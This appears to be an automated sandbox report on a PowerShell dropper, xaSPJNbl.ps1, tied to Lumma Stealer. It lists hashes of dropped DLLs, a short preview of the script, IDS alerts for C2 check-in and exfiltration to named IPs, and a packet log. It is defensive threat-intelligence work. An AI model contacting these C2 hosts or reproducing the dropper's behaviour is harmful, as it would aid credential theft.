                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18896
                                                                                                                                                          Entropy (8bit):7.013421195915214
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:CEF4B9F680FAAE322170B961A3421C5B
                                                                                                                                                          SHA1:DD89A2D355DF989BBD8648789472BFE9C14AFCD5
                                                                                                                                                          SHA-256:1FE918979F1653D63BB713D4716910D192CD09F50017A6ECB4CE026ED6285DF9
                                                                                                                                                          SHA-512:F56617290D4AC25231631D708A6C8B003BDD358BAE9672F7DEE539A96B292C13E04C65BA5F05937C52F73288EB3DD7CBA479ED030942A0D9D3A15512548FA4A9
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18384
                                                                                                                                                          Entropy (8bit):7.0823956037120475
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:69DF2CCE4528C9E38D04A461BA1F992B
                                                                                                                                                          SHA1:BB1D0DA76CF696ACF2E0F4E03E6D63FBAD4325AA
                                                                                                                                                          SHA-256:A108A8F20DED00E742A1F818EF00EB425990B6B24A2BCD060DEA4D7F06D3F165
                                                                                                                                                          SHA-512:4D02EECDDA0FFFC10D5509830079984C7A887B4CA3A80359AA56117B302DCFA594B0710C9F415C823D1674B5C689D31AADE44F21750CCD7D53010E67F0B6F0D2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):17872
                                                                                                                                                          Entropy (8bit):7.041259495908992
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:C6553959AECD5BAC01C0673CFDF86B68
                                                                                                                                                          SHA1:045585659843F7214C79659A88302996BFB480A2
                                                                                                                                                          SHA-256:68BD9C086D210EB14E78F00988BA88CEAF9056C8F10746AB024990F8512A2296
                                                                                                                                                          SHA-512:AE8E42A428202D05FEA4F1E6A4D3B919B644A792567F876B0FC392B1CDDB856547B4C3B433C002FDED6DF4D4DAEC8FB7235F30D1FF9F42943D9E2557ADE364D6
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18896
                                                                                                                                                          Entropy (8bit):7.04162157199281
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:7190CBFAD2D7773D3B88CCC25533A651
                                                                                                                                                          SHA1:71FE2BACC14B433D51328EA0810C1A030C80D844
                                                                                                                                                          SHA-256:4AEEAE0AC9F6C1B0B8835067EA3B7FC429F353565F18DE7858F4EA5D6F72072E
                                                                                                                                                          SHA-512:B314666C400268BF261C5F9E9966AD0680435241E7A24D85B28AE4405D798B80EEDB65ED8DB7E8D93DF90F886A6719A8B7ACE8C25D0429392BC061868890C40C
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):21968
                                                                                                                                                          Entropy (8bit):6.8725461224565505
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:3E415147CCD7C712618868BDD7A200CD
                                                                                                                                                          SHA1:B332F29915D846519DCB725D39E8C50604D7B414
                                                                                                                                                          SHA-256:77B69E829BDC26C7B2474BE6B8A2382345B2957E23046897E40992A8157A7BA1
                                                                                                                                                          SHA-512:7E7E50F148414F8A84B4C39D3C7C1E0952F86F95873F3ABC25B7F08574BBCCE41394A59451868020B178BF68DF12615BD356677E8C935C1185C5D07D15E61896
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18384
                                                                                                                                                          Entropy (8bit):7.021659429657045
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:AD0CBB9978FCF60D9E9CA45DE6A28D30
                                                                                                                                                          SHA1:65549D9D7EE72DE7D0CC356F92AD22EEB8DC18CC
                                                                                                                                                          SHA-256:6C9C0DC7B36AFE07DFB07DD373FC757FF25DF4793E6384D7A6021471A474F0B9
                                                                                                                                                          SHA-512:AAF4919E7629CD0BCF52283D578214043A4BDF6597A7D808DFCECD5FA1ECBD0B1395C60A165C575D20CA42928500815E14837B9E05530A667C6898E14243D64D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):19920
                                                                                                                                                          Entropy (8bit):7.031497633335967
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:14F407D94C77B1B0039AE2C89B07A2FF
                                                                                                                                                          SHA1:528B91A8A8611DA45463FAC0A6BD5C58233F8FBC
                                                                                                                                                          SHA-256:85B1B189CE9E3C6F4D2EFDD4CD82B0807F681BEA2D28851CAAF545990DE99000
                                                                                                                                                          SHA-512:152B97A656ACD984592BF58854222EC97C661F9F8D19557EA03501457FB5A07821F90D332F21B1B51A5BCE5AB84F862354B8EE21C7C1F6B7AA1C127F4A73AB5D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18896
                                                                                                                                                          Entropy (8bit):7.000635932635543
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:9C373C00AC3138233BDF1655C7BE8E86
                                                                                                                                                          SHA1:EE38F868E32950D1B8185249EDC6AD4E1BC5592F
                                                                                                                                                          SHA-256:0166EDFB23CFC77519C97862A538A69B5D805D6A17D6E235F46927AF5C04B3C9
                                                                                                                                                          SHA-512:D2F56B3169C1FEA1A604523B2215DBAD02C6306BD804445B367756F288310554DD049AEFD024BABC26A3B270B8AEDE8B10E5EC8D80E772D3D1076B8013491067
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18384
                                                                                                                                                          Entropy (8bit):7.080870494842615
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:C5D747F96237B6E9AA85C58745D30C80
                                                                                                                                                          SHA1:C6AD21597265FAF25EA8D7F09577F3E6F4F7BE10
                                                                                                                                                          SHA-256:F16447B5FC7FE6FB8A6699A3CEF1B2B8BA92D408579BCC272D3DD76ACD801E2A
                                                                                                                                                          SHA-512:5BCEE06D62633ECDFDF5DD1BF92FF9278F535DC5F21BFE36FAACA15E378BEB4DA6BE7BA9767569119FBF9F7383FFDB3A4A17C99D5918A64B8E12926AC0EC3140
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):27088
                                                                                                                                                          Entropy (8bit):6.650191961270333
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:BC418A3461C5FDFA1A0D75F7E03D08A7
                                                                                                                                                          SHA1:5CFEFA62226F117B7E2FE58961269294EB62B84C
                                                                                                                                                          SHA-256:C7115159BABDAA1F52E478E67B4E612DA2332FDA4E4036999B29425FE303B6E8
                                                                                                                                                          SHA-512:4C9F3D461A5FC42D829D517EF523423CEB18F6667E6F2D83F1E5CD645A359D32B58AC8652EA734F567ED3B9E2999F358BF0E95BF38265DF7ABE3FE4B2F5FA978
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):26064
                                                                                                                                                          Entropy (8bit):6.650909182376859
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:9E9C6F83A015029808F5257F7B7E39C6
                                                                                                                                                          SHA1:5674192EB60EB152773FE0D50161F32759E2EA0F
                                                                                                                                                          SHA-256:C6B4E1D903B3CC83BFAFFBE4E82EEE634CFF8F97F12217CAA45B464DDC4E1455
                                                                                                                                                          SHA-512:6E124732646CBE95EF94773D57B08C68A399854F906B14F15996BB12400D5E92B34596C38795A3BA4CDF8DB4E8DD5AD486890634951A4686C6679B486AB19CB0
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):70608
                                                                                                                                                          Entropy (8bit):5.82653654092116
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:AD8D9A6EA592A6C8A78C67A805CEC952
                                                                                                                                                          SHA1:3E9F35013044BE456F33E300418453AB12C70DF8
                                                                                                                                                          SHA-256:696C10112D8B86A46E5057CBD0BF40728E79C6BB49CDA1F2C67FE45D0FC1258D
                                                                                                                                                          SHA-512:31C1B5717432B67E6B150911747F34E8099C1A0870262BB3B5D3AC5C9E28B3B08E4239BD105408318806F983B3FCD10E617B2385511C46EFE9FE58A9CD4A7067
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18896
                                                                                                                                                          Entropy (8bit):7.015371870860414
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:66F4E530A19ED2F6862B5CE946437875
                                                                                                                                                          SHA1:016BFA4EAFB407E43ABDCD9582DBCA7DCF85D3DE
                                                                                                                                                          SHA-256:542A22540CDB7DF46D957A0208D50507916F7C737BEA833931239D56EBE8D68C
                                                                                                                                                          SHA-512:2653B2118F4DB250850DCEFD3536E0FD2BC55E9774376B51E586658E4E5D79A35CB425EBE0A8391124997E24C8AAA84BAC799162A31446EF47DB667A4A3F0EB9
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          File type:ASCII text, with very long lines (65265), with CRLF line terminators
                                                                                                                                                          Entropy (8bit):5.998098102409046
                                                                                                                                                          TrID:
                                                                                                                                                            File name:xaSPJNbl.ps1
                                                                                                                                                            File size:47'033'442 bytes
                                                                                                                                                            MD5:b1c4cb0479a434c478b9e5e38cc42fe0
                                                                                                                                                            SHA1:ad45a2bccacb5ae981358cba37260ca3fe4e1e24
                                                                                                                                                            SHA256:a4063200b38b2a71b1f70d11a73828ebaadd0db2044cc3fcdc29aabb17341224
                                                                                                                                                            SHA512:661439f4c1521b898bc55c2a36b6cbe05033292da1149d603d5b0fe427159b440cd56325a0185f1499f36fd39cd07d068665fb511496f8851761ff34119508ed
                                                                                                                                                            SSDEEP:49152:gfnNe/U6WuKfPXzJkhfCFG3pD8jcO2sq8y7AhzveWkc+VAHwMCJtBuYT6+APN/fg:n
                                                                                                                                                            TLSH:B0A7339079F5F95B037CD12320BEAF1B0EB09EA38E05B16976E5F8DB115A732096384D
                                                                                                                                                            File Content Preview:.. $qNbKJOQg = "Stop".. Set-Location $Env:AppData.. $oLsXWGVm = "$Env:AppData\zcZPHzDH".. if (Test-Path $oLsXWGVm) {.. if (Test-Path "$Env:AppData\NIHekPsI.txt") {.. Remove-Item "$Env:AppData\NIHekPsI.txt".. }..
                                                                                                                                                            Icon Hash:3270d6baae77db44
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-19T20:06:24.186580+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49709 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:24.636452+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49709 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:24.636452+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49709 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:26.831577+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49710 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:27.534872+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.8 | 49710 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:27.534872+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49710 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:30.348718+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49712 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:31.592852+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49713 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:34.731965+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49714 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:36.510272+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49715 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:36.881578+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.8 | 49715 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:37.872566+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49716 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:40.548988+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49717 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:40.963062+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49717 | 188.114.97.3 | 443 | TCP
2024-11-19T20:06:41.473361+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49718 | 172.67.75.40 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                            Nov 19, 2024 20:06:31.105921030 CET49713443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:31.106519938 CET49713443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:31.106532097 CET44349713188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:31.592628002 CET44349713188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:31.592852116 CET49713443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:31.610743046 CET49713443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:31.610764980 CET44349713188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:31.611080885 CET44349713188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:31.612889051 CET49713443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:31.612889051 CET49713443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:31.612929106 CET44349713188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:31.613250971 CET49713443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:31.659329891 CET44349713188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:33.977305889 CET44349713188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:33.977412939 CET44349713188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:33.977526903 CET49713443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:33.977560043 CET49713443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:33.977571011 CET44349713188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:34.260116100 CET49714443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:34.260174036 CET44349714188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:34.260236979 CET49714443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:34.260611057 CET49714443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:34.260626078 CET44349714188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:34.731894016 CET44349714188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:34.731965065 CET49714443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:34.733375072 CET49714443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:34.733385086 CET44349714188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:34.733707905 CET44349714188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:34.735706091 CET49714443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:34.735862970 CET49714443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:34.735902071 CET44349714188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:34.736056089 CET49714443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:34.736066103 CET44349714188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:35.248878002 CET44349714188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:35.249104023 CET49714443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:35.249129057 CET44349714188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:35.249176025 CET49714443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:36.033591986 CET49715443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:36.033634901 CET44349715188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:36.033698082 CET49715443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:36.033988953 CET49715443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:36.034003973 CET44349715188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:36.510191917 CET44349715188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:36.510272026 CET49715443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:36.512196064 CET49715443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:36.512211084 CET44349715188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:36.512502909 CET44349715188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:36.514146090 CET49715443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:36.514564991 CET49715443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:36.514573097 CET44349715188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:36.881597996 CET44349715188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:36.881685972 CET44349715188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:36.881936073 CET49715443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:36.882298946 CET49715443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:36.882323027 CET44349715188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.413809061 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.413849115 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.413917065 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.414279938 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.414294004 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.872503996 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.872565985 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.874514103 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.874521017 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.874746084 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.876420021 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.876806974 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.876828909 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.877058029 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.877084017 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.877186060 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.877218008 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.877423048 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.877458096 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.877573013 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.877607107 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.877667904 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.877686024 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:39.974550962 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:39.974803925 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:39.975053072 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:39.975263119 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:39.975269079 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.085146904 CET49717443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:40.085192919 CET44349717188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.085279942 CET49717443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:40.085592031 CET49717443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:40.085608006 CET44349717188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.548768044 CET44349717188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.548988104 CET49717443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:40.553042889 CET49717443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:40.553055048 CET44349717188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.553289890 CET44349717188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.555039883 CET49717443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:40.555229902 CET49717443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:40.555247068 CET44349717188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.963026047 CET44349717188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.963129997 CET44349717188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.963181973 CET49717443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:40.973906040 CET49717443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:40.973948002 CET44349717188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.973963976 CET49717443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:40.973972082 CET44349717188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.998095036 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:40.998136044 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.998286009 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:40.998645067 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:40.998660088 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.473272085 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.473361015 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:41.475469112 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:41.475485086 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.475810051 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.477446079 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:41.519331932 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579271078 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579355001 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579395056 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579428911 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579431057 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:41.579441071 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579479933 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579489946 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:41.579495907 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579533100 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:41.579545021 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579591036 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:41.579596043 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579608917 CET44349718172.67.75.40192.168.2.8
